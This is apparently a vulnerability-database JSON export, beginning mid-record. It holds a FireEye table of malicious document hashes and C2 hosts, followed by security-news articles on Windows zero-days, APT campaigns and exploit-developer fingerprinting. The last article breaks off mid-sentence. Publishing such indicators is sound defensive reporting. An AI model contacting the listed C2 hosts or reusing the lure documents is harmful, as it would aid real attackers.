Following [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>), this is the second major vulnerability in as many months that has been used for both espionage and crime.\n\n**MD5**\n\n| \n\n**Filename**\n\n| \n\n**C2 Host** \n \n---|---|--- \n \n2abe3cc4bff46455a945d56c27e9fb45\n\n| \n\nConfirmation_letter.docx.bin\n\n(NETWIRE)\n\n| \n\n84.200.2.12 \n \ne091425d23b8db6082b40d25e938f871\n\n| \n\nConfirmation_letter.docx\n\n(NETWIRE)\n\n| \n\n138.201.44.30 \n \n006bdb19b6936329bffd4054e270dc6a\n\n| \n\nConfirmation_letter_ACM.docx\n\n(NETWIRE)\n\n| \n\n185.106.122.113 \n \n15660631e31c1172ba5a299a90938c02\n\n| \n\nst07383.en17.docx\n\n(SHIRIME)\n\n| \n\ntnsc.webredirect.org \n \nf8e92d8b5488ea76c40601c8f1a08790\n\n| \n\nTrump's_Attack_on_Syria_English.docx\n\n(GAMEFISH)\n\n| \n\nwmdmediacodecs.com \n \nTable 1: Source Exploit Documents\n\nTable 2: CVEs related to these attacks\n\n#### Acknowledgements\n\niSIGHT Intelligence Team, FLARE Team, FireEye Labs, Microsoft Security Response Center (MSRC).\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T13:00:00", "type": "fireeye", "title": "EPS Processing Zero-Days Exploited by Multiple Threat Actors ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0001", "CVE-2017-0263", "CVE-2017-0199", "CVE-2016-7255", "CVE-2017-0262", "CVE-2017-0261"], "modified": "2017-05-09T13:00:00", "id": "FIREEYE:35D0439B3D476357F4D2F51F3D5CD294", "href": "https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-01-27T09:18:01", "description": "[](<https://1.bp.blogspot.com/-YHGy8IvdU5A/WCNWb0AOdHI/AAAAAAAAqLQ/ZFC2_5FuLBsj06QydsVi5k6oMzvGFz5vACLcB/s1600/microsoft-security-update.png>)\n\nMicrosoft was very upset with Google last week when its Threat Analysis Group publically disclosed a critical [Windows kernel vulnerability](<https://thehackernews.com/2016/10/google-windows-zero-day.html>) (CVE-2016-7255) that had yet to be patched. \n \nThe company [criticized Google's move](<https://thehackernews.com/2016/11/windows-zeroday-exploit.html>), claiming that the disclosure of the vulnerability, which was being exploited in the wild, put its customers \"at potential risk.\" \n \nThe vulnerability affects all Windows versions from Windows Vista through current versions of Windows 10, and Microsoft was set to issue a fix come this month's Patch Tuesday. \n \nSo, as part of its monthly Patch Tuesday, Microsoft today patched the security flaw in Windows that was actively being exploited by hackers. 
\n \nAccording to Microsoft's [security bulletin](<https://technet.microsoft.com/library/security/MS16-135>) released today, any hacker who tricked victims into running a \"specially-crafted application\" could successfully exploit the system bug and gain the ability to \"install programs; view, change, or delete data; or create new accounts with full user rights.\" \n \nOnce exploited, the bug could be used to escape the sandbox protection and execute malicious code on the compromised Windows machine. \n \nRated as \"important,\" the vulnerability was being exploited by Strontium group, also known as Fancy Bear, Sofacy, and APT 28, in targeted attacks. \n \n[Fancy Bear](<https://thehackernews.com/2016/11/windows-zeroday-exploit.html>) is the same group of hackers that has also been accused by the US Intelligence community of hacking the [Democratic National Committee](<https://thehackernews.com/2016/07/russia-dnc-email-hack.html>), Clinton Campaign Chair [John Podesta](<https://thehackernews.com/2016/10/wikileaks-clinton-leak.html>), and former Secretary of State Colin Powell, among others. \n \nBesides this controversial flaw exposed by Google last week, the security bulletin also fixes multiple elevation of privilege bugs. \n \nPatch Tuesday also contains several critical security patches that affect all versions of Windows as well as other important updates and fixes for both Internet Explorer and Edge. 
\n \nSo, I strongly recommend home users and companies to ensure that their Windows PC is up-to-date with all of Microsoft's latest security fixes as of today.\n", "cvss3": {}, "published": "2016-11-09T06:12:00", "type": "thn", "title": "Microsoft Patches Windows Zero-Day Flaw Disclosed by Google", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-7255"], "modified": "2016-11-09T17:12:11", "id": "THN:F8BDC767F3D202913920E1C28D137377", "href": "https://thehackernews.com/2016/11/microsoft-windows-update.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-09T12:40:07", "description": "[](<https://thehackernews.com/images/-VgCR2Fih8qA/X3bKP0yAofI/AAAAAAAA3Xk/2BjzswcnClsJubOJnK-h72WdkV--wVjvwCLcBGAsYHQ/s0/exploit-development.jpg>)\n\nWriting advanced malware for a threat actor requires different groups of people with diverse technical expertise to put them all together. But can the code leave enough clues to reveal the person behind it?\n\nTo this effect, cybersecurity researchers on Friday detailed a new methodology to identify exploit authors that use their unique characteristics as a fingerprint to track down other exploits developed by them.\n\nBy deploying this technique, the researchers were able to link 16 Windows local privilege escalation (LPE) exploits to two zero-day sellers \"Volodya\" (previously called \"BuggiCorp\") and \"PlayBit\" (or \"luxor2008\").\n\n\"Instead of focusing on an entire malware and hunting for new samples of the malware family or actor, we wanted to offer another perspective and decided to concentrate on these few functions that were written by an exploit developer,\" Check Point Research's [Itay Cohen and Eyal Itkin](<https://research.checkpoint.com/2020/graphology-of-an-exploit-volodya/>) noted.\n\n## Fingerprinting an Exploit Writer's Characteristics\n\nThe idea, in a nutshell, is to fingerprint an exploit for specific artifacts that can uniquely tie 
it to a developer. It could be in using hard-coded values, string names, or even how the code is organized and certain functions are implemented.\n\nCheck Point said their analysis began in response to a \"complicated attack\" against one of its customers when they encountered a 64-bit malware executable that exploited [CVE-2019-0859](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0859>) to gain elevated privileges.\n\nNoticing the fact that the exploit and the malware were written by two different sets of people, the researchers used the binary's properties as a unique hunting signature to find at least 11 other exploits developed by the same developer named \"Volodya\" (or \"Volodimir\").\n\n[](<https://thehackernews.com/images/-8XQpJ6aaOXE/X3bJepUcWVI/AAAAAAAA3Xc/RKyut5eDU-EfRXvFOJBCku7GCiTWNXJwgCLcBGAsYHQ/s0/malware-1.jpg>)\n\n\"Finding a vulnerability, and reliably exploiting it, will most probably be done by specific teams or individuals who specialize in a particular role. The malware developers for their part don't really care how it works behind the scenes, they just want to integrate this [exploits] module and be done with it,\" the researchers said.\n\nInterestingly, Volodya \u2014 likely of Ukrainian origin \u2014 has been [previously linked](<https://www.zdnet.com/article/mysterious-hacker-has-been-selling-windows-0-days-to-apt-groups-for-three-years/>) to selling Windows zero-days to cyberespionage groups and crimeware gangs for anywhere between $85,000 to $200,000.\n\nChief among them was an LPE exploit that leveraged a memory corruption in \"[NtUserSetWindowLongPtr](<https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowlongptra>)\" (CVE-2016-7255), which has been widely used by ransomware operators like GandCrab, Cerber, and [Magniber](<https://securelist.com/magnitude-exploit-kit-evolution/97436/>). 
It's now believed that Volodya [advertised this LPE zero-day](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/zero-day-auction-for-the-masses/>) on the Exploit.in cybercrime forum in May 2016.\n\nIn all, five zero-day and six one-day exploits were identified as developed by Volodya over a period of 2015-2019. Subsequently, the same technique was employed to identify five more LPE exploits from another exploit writer known as PlayBit.\n\n## An Extensive Clientele\n\nStating the exploit samples shared code level similarities to grant SYSTEM privileges to the desired process, the researchers said, \"both of our actors were very consistent in their respective exploitation routines, each sticking to their favorite way.\"\n\nWhat's more, Volodya also appears to have switched up his tactics during the intervening years, with the developer shifting from selling the exploits as embeddable source code in the malware to an external utility that accepts a specific API.\n\nBesides ransomware groups, Volodya has been found to cater to an extensive clientele, including the Ursnif banking trojan, and APT groups such as Turla, APT28, and Buhtrap.\n\n[](<https://thehackernews.com/images/-MNtIN_O8MUA/X3bJJ7ypHuI/AAAAAAAA3XU/cceh7GbuWRUA-YVEd84SYiMoxzAoPtLbwCLcBGAsYHQ/s0/malware.jpg>)\n\n\"The APT customers, Turla, APT28, and Buhtrap, are all commonly attributed to Russia and it is interesting to find that even these advanced groups purchase exploits instead of developing them in-house,\" Check Point observed in its analysis. 
\"This is another point which further strengthens our hypothesis that the written exploits can be treated as a separate and distinct part of the malware.\"\n\nWith cyberattacks expanding in scope, frequency, and magnitude, using an exploit developer's code signature as a means to track down bad actors could provide valuable insight into the black exploit market.\n\n\"When Check Point finds a vulnerability, we demonstrate its severity, report it to the appropriate vendor, and make sure it's patched, so it doesn't pose a threat,\" Cohen said. \"However, for individuals trading these exploits, it's a completely different story. For them, finding the vulnerability is just the beginning. They need to reliably exploit it on as many versions as possible, in order to monetize it to a customer's satisfaction.\"\n\n\"This research provides insight into how that is achieved, and the buyers in this market, which often include nation-state actors. We believe that this research methodology can be used to identify additional exploit writers.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-02T09:59:00", "type": "thn", "title": "Researchers Fingerprint Exploit Developers Who Help Several Malware Authors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255", "CVE-2019-0859"], "modified": "2020-10-02T10:18:28", "id": "THN:89E2A7A39CBD630AB15218875ED90D19", "href": "https://thehackernews.com/2020/10/exploit-development.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:35", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhOB2VqcpzvIvbqWJmlBkCMLbnUxk3Z5xT2z3m3Gq-YuuBlN_NqdLRsokokD3U-FEY86UgsPht9jJl64elkaTldrF5sP92LWMSa6SiRtCYAh531p1yOcpxfIcK7KxbUiT4AcuUBJjXXV-KoHFwXcRxhZiXlPt_nDcSDmlAdw1IQJzBJ_AKFxIs-zvlV>)\n\nThe U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) is urging federal agencies to secure their systems against an actively exploited security vulnerability in Windows that could be abused to gain elevated permissions on affected hosts.\n\nTo that end, the agency has added [CVE-2022-21882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>) (CVSS score: 7.0) to the [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), necessitating that Federal Civilian Executive Branch (FCEB) agencies patch all systems against this vulnerability by February 18, 2022.\n\n\"These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise,\" CISA [said](<https://www.cisa.gov/uscert/ncas/current-activity/2022/02/04/cisa-adds-one-known-exploited-vulnerability-catalog>) in an advisory published last week.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEi_i5GcfQrAT38f9axbzmFO-Sp4pa-68-q21bq9ALE0pr3rtd7YlA1XdpzF_M0ipJE_4ckPGcdP2bX7xhUeQIbU_JpRuDg5QbRJrTDOpgnI3EmoXugjloJtH_JOaWEeDDLiPE54NUuVokjdewdmpU6RxL1iBbRgZKIod0B73dVQnznjvTQNCy2MQ0sf>)\n\n[CVE-2022-21882](<https://github.com/L4ys/CVE-2022-21882>), which has been tagged with an \"Exploitation More Likely\" exploitability index assessment, concerns a case of elevation of privilege vulnerability affecting the Win32k component. The bug was addressed by Microsoft as part of its January 2022 [Patch Tuesday](<https://thehackernews.com/2022/01/first-patch-tuesday-of-2022-brings-fix.html>) updates.\n\n\"A local, authenticated attacker could gain elevated local system or administrator privileges through a vulnerability in the Win32k.sys driver,\" the Windows maker said. 
The flaw impacts Windows 10, Windows 11, Windows Server 2019, and Windows server 2022.\n\nIt's worth noting that the [security vulnerability](<https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2022/CVE-2022-21882.html>) is also a [bypass](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>) for another escalation of privilege flaw in the same module ([CVE-2021-1732](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732>), CVSS score: 7.8) that Microsoft resolved in [February 2021](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) and has since been detected in [exploits in the wild](<https://www.cisa.gov/uscert/ncas/current-activity/2021/02/09/microsoft-warns-windows-win32k-privilege-escalation>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-07T05:03:00", "type": "thn", "title": "CISA Orders Federal Agencies to Patch Actively Exploited Windows Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": 
"AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-02-07T05:03:44", "id": "THN:012EBB2FE2687F178FBCC3AB8ABEF778", "href": "https://thehackernews.com/2022/02/cisa-orders-federal-agencies-to-patch.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T02:22:45", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgx6lZB3oJ9X1sLlKCznoOeSkcDGdxDDzLpQUslIFxcqcdMH_UDcAqH4PjZiqkCxL4jI-B00Zx79nco8uEEf5XiuDqkexKPHK5G1oPT3v5UXngC8t4QHYPLfIhQTOw0d5FZR2WUXYg38_ydmYOd8biQq4tgAK_UHmsEyzslVH8sLV19IMC1QE6NMR95/s728-e100/hacker-code.jpg>)\n\nAn espionage-focused threat actor known for targeting China, Pakistan, and Saudi Arabia has expanded to set its sights on Bangladeshi government organizations as part of an ongoing campaign that commenced in August 2021.\n\nCybersecurity firm Cisco Talos attributed the activity with moderate confidence to a hacking group dubbed the [Bitter APT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat>) based on overlaps in the command-and-control (C2) infrastructure with that of prior campaigns mounted by the same actor.\n\n\"Bangladesh fits the profile we have defined for this threat actor, previously targeting Southeast Asian countries including [China](<https://www.anomali.com/blog/suspected-bitter-apt-continues-targeting-government-of-china-and-chinese-organizations>), Pakistan, and Saudi Arabia,\" Vitor Ventura, lead security researcher at Cisco Talos for EMEA and Asia, [told](<https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html>) The Hacker News.\n\n\"And now, in this latest campaign, they have widened their reach to Bangladesh. 
Any new country in southeast Asia being targeted by Bitter APT shouldn't be of surprise.\"\n\nBitter (aka APT-C-08 or T-APT-17) is suspected to be a South Asian hacking group motivated primarily by intelligence gathering, an operation that's facilitated by means of malware such as BitterRAT, ArtraDownloader, and AndroRAT. Prominent targets include the energy, engineering, and government sectors.\n\nThe earliest attacks distributing the mobile version of BitterRAT date back to September 2014, with the actor having a history of leveraging zero-day flaws \u2014 [CVE-2021-1732](<https://blog.cyble.com/2021/02/24/bitter-apt-enhances-its-capability-with-windows-kernel-zero-day-exploit/>) and [CVE-2021-28310](<https://thehackernews.com/2021/04/nsa-discovers-new-vulnerabilities.html>) \u2014 to its advantage and accomplishing its adversarial objectives.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEje8jC-uVfJtCg-HT90ER0XL1ynji-bMSmKY4TsMgVZDJ4BUis2Ee9BqhaK1IgRgN3C39Ble5vyCaoUWCWOSw_sCPSi1K1pqxhfFDtU7-XFOlKQELXIUmacfXYgeFx_YhnGNvj-1DRRGm2mRliJTxxHv8CqVxw48P0ghcuKJ0YObfTzh23rHBy_Bz3i/s728-e100/talos.jpg>)\n\nThe latest campaign, targeting an elite entity of the Bangladesh government, involves sending spear-phishing emails to high-ranking officers of the Rapid Action Battalion Unit of the Bangladesh police (RAB).\n\nAs is typically observed in other social engineering attacks of this kind, the missives are designed to lure the recipients into opening a weaponized RTF document or a Microsoft Excel spreadsheet that exploits previously known flaws in the software to deploy a new trojan dubbed \"ZxxZ.\"\n\nZxxZ, named so after a separator used by the malware when sending information back to the C2 server, is a 32-bit Windows executable compiled in Visual C++.\n\n\"The trojan masquerades as a Windows Security update service and allows the malicious actor to perform remote code execution, allowing the attacker to perform any other activities by installing other 
tools,\" the researchers explained.\n\nWhile the malicious RTF document exploits a memory corruption vulnerability in Microsoft Office's Equation Editor ([CVE-2017-11882](<https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>)), the Excel file abuses two remote code execution flaws, [CVE-2018-0798](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2018-0798>) and [CVE-2018-0802](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2018-0802>), to activate the infection sequence.\n\n\"Actors often change their tools to avoid detection or attribution, this is part of the lifecycle of a threat actor showing its capability and determination,\" Ventura said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-11T12:37:00", "type": "thn", "title": "Bitter APT Hackers Add Bangladesh to Their List of Targets in South Asia", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 
10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802", "CVE-2021-1732", "CVE-2021-28310"], "modified": "2022-05-12T01:27:46", "id": "THN:75586AE52D0AAF674F942498C96A2F6A", "href": "https://thehackernews.com/2022/05/bitter-apt-hackers-add-bangladesh-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:21", "description": "[](<https://thehackernews.com/images/-YROWoUQuY8Q/YHZ1yLhkJGI/AAAAAAAACQw/rmFTIz73mk81DI0P2vG2MpkxtMrT5jqbgCLcBGAsYHQ/s0/windows-update-smb-flaw.jpg>)\n\nIn its April slate of patches, Microsoft rolled out fixes for a total of [114 security flaws](<https://msrc-blog.microsoft.com/2021/04/13/april-2021-update-tuesday-packages-now-available/>), including an actively exploited zero-day and four remote code execution bugs in Exchange Server.\n\nOf the [114 flaws](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Apr>), 19 are rated as Critical, 88 are rated Important, and one is rated Moderate in severity.\n\nChief among them is [CVE-2021-28310](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28310>), a privilege escalation vulnerability in Win32k that's said to be under active exploitation, allowing attackers to elevate privileges by running malicious code on a target system. 
\n\nCybersecurity firm Kaspersky, which discovered and reported the flaw to Microsoft in February, linked the zero-day exploit to a threat actor named Bitter APT, which was found exploiting a similar flaw ([CVE-2021-1732](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>)) in attacks late last year.\n\n\"It is an escalation of privilege (EoP) exploit that is likely used together with other browser exploits to escape sandboxes or get system privileges for further access,\" Kaspersky researcher Boris Larin [said](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>).\n\n## NSA Found New Bugs Affecting Exchange Server\n\nAlso fixed by Microsoft are four remote code execution (RCE) flaws (CVE-2021-28480 through CVE-2021-28483) affecting [on-premises Exchange Servers](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-april-2021-exchange-server-security-updates/ba-p/2254617>) 2013, 2016, and 2019 that were reported to the company by the U.S. National Security Agency (NSA). 
Two of the code execution bugs are unauthenticated and require no user interaction, and carry a CVSS score of 9.8 out of a maximum of 10.\n\n[](<https://thehackernews.com/images/-8FoY65fokvw/YHZ2L3VP2bI/AAAAAAAACQ4/krAsXabe1VgmdxN0j2h4MtXElmsH8ApJACLcBGAsYHQ/s0/microsoft-exchnage.jpg>)\n\nWhile the Windows maker said it had found no evidence of any active exploits in the wild, it's recommended that customers install these updates as soon as possible to secure the environment, particularly in light of the widespread Exchange Server hacks last month and new findings that attackers are attempting to leverage the [ProxyLogon](<https://thehackernews.com/2021/03/proxylogon-exchange-poc-exploit.html>) exploit to [deploy malicious cryptominers](<https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/>) onto Exchange Servers, with the payload being hosted on a compromised Exchange Server.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) has also [revised](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/13/apply-microsoft-april-2021-security-update-mitigate-newly>) the emergency directive it issued last month, stating \"these vulnerabilities pose an unacceptable risk to the Federal enterprise and require an immediate and emergency action,\" while cautioning that the underlying flaws can be weaponized by reverse-engineering the patch to create an exploit.\n\nCybersecurity firm Check Point, which has been tracking ongoing cyber threats exploiting the Exchange Server flaws, said a total of 110,407 attacks have been prevented targeting government, manufacturing, finance, healthcare, legal, and insurance industries in the U.S., U.K., Germany, Netherlands, and Brazil.\n\n## FBI Removed Backdoors From Hacked MS Exchange servers\n\nWhat's more, the U.S. 
Federal Bureau of Investigation (FBI) carried out a \"successful action\" to \"copy and remove\" web shells planted by adversaries on hundreds of victim computers using the ProxyLogon flaws. The FBI is said to have wiped the web shells that were installed by Hafnium that could have been used to maintain and escalate persistent, unauthorized access to U.S. networks.\n\n\"The FBI conducted the removal by issuing a command through the web shell to the server, which was designed to cause the server to delete only the web shell (identified by its unique file path),\" the Justice Department [said](<https://www.justice.gov/usao-sdtx/pr/justice-department-announces-court-authorized-effort-disrupt-exploitation-microsoft>) in a statement detailing the court-authorized operation.\n\n## 27 RCE Flaws in Windows RPC and Other Fixes\n\nMicrosoft also said four additional vulnerabilities were publicly known at the time of release but not exploited \u2014\n\n * CVE-2021-28458 - Azure ms-rest-nodeauth Library Elevation of Privilege Vulnerability\n * CVE-2021-27091 - RPC Endpoint Mapper Service Elevation of Privilege Vulnerability\n * CVE-2021-28437 - Windows Installer Information Disclosure Vulnerability\n * CVE-2021-28312 - Windows NTFS Denial of Service Vulnerability\n\nIn addition, April's Patch Tuesday update also addresses a whopping 27 RCE flaws in Remote Procedure Call (RPC) runtime, a Hyper-V security feature bypass vulnerability (CVE-2021-28444), and multiple privilege escalation flaws in Windows Speech Runtime, Windows Services and Controller App, Windows Secure Kernel Mode, Windows Event Tracing, and Windows Installer.\n\n## Software Patches From Other Vendors\n\nBesides Microsoft, a number of other vendors have also released a slew of patches on Tuesday \u2014\n\n * [Adobe](<https://helpx.adobe.com/security.html>) (security updates for Photoshop, Digital Editions, RoboHelp, and Bridge)\n * [DELL](<https://www.dell.com/support/security/en-in>)\n * Linux distributions 
[SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2021-April/date.html>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), and [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=573801649>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp>), and\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-14T04:58:00", "type": "thn", "title": "NSA Discovers New Vulnerabilities Affecting Microsoft Exchange Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2021-27091", "CVE-2021-28310", "CVE-2021-28312", "CVE-2021-28437", "CVE-2021-28444", 
"CVE-2021-28458", "CVE-2021-28480", "CVE-2021-28483"], "modified": "2021-04-15T05:57:31", "id": "THN:F163C7AB35BEF8E28924E14B02752181", "href": "https://thehackernews.com/2021/04/nsa-discovers-new-vulnerabilities.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:08", "description": "[](<https://thehackernews.com/images/-pOCXw5Vbz4E/YCNjQpEwYHI/AAAAAAAABuA/DON2kef7nngGbrXuKE_q5XlYxFXBjgnbQCLcBGAsYHQ/s0/microsoft-windows-update.jpg>)\n\nMicrosoft on Tuesday [issued fixes for 56 flaws](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Feb>), including a critical vulnerability that's known to be actively exploited in the wild.\n\nIn all, 11 are listed as Critical, 43 are listed as Important, and two are listed as Moderate in severity \u2014 six of which are previously disclosed vulnerabilities.\n\nThe updates cover .NET Framework, Azure IoT, Microsoft Dynamics, Microsoft Edge for Android, Microsoft Exchange Server, Microsoft Office, Microsoft Windows Codecs Library, Skype for Business, Visual Studio, Windows Defender, and other core components such as Kernel, TCP/IP, Print Spooler, and Remote Procedure Call (RPC).\n\n### A Windows Win32k Privilege Escalation Vulnerability\n\nThe most critical of the flaws is a Windows Win32k privilege escalation vulnerability 